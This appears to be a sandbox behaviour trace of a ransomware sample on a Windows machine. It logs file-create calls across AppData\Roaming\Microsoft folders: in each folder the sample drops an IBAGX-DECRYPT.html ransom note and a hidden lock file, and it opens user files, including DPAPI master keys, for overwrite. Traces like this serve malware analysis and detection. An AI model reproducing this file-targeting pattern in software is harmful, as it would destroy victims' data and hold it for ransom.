Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\XLSTART\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Excel\XLSTART\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IME12\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IME12\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP12\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP12\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP8_1\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP8_1\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP9_0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\IMJP9_0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\05P2C0FB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\05P2C0FB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\SFX4RKM5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\SFX4RKM5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\T9DX4T6Q\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\T9DX4T6Q\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\PB5UWKXI\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\PB5UWKXI\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\TIIZUCFY\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\TIIZUCFY\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\ZQH8NGYD\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\ZQH8NGYD\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MMC\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MMC\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\MSO1033.acl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Office\Recent\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\Outlook.srs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Outlook\Outlook.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\PowerPoint\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\PowerPoint\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Proof\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Proof\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\a5a8c4cf-064f-463d-8c91-f4df942efa7a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\b803cc0b-9e6a-422e-8340-ccf853f96967 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\d418ef6b-4b3f-4eb8-bc3b-d8f570853793 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\f8b51922-782c-4671-ac20-383d1db7c4fb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\S-1-5-21-3785418085-2572485238-895829336-1000\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Protect\SYNCHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Speech\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
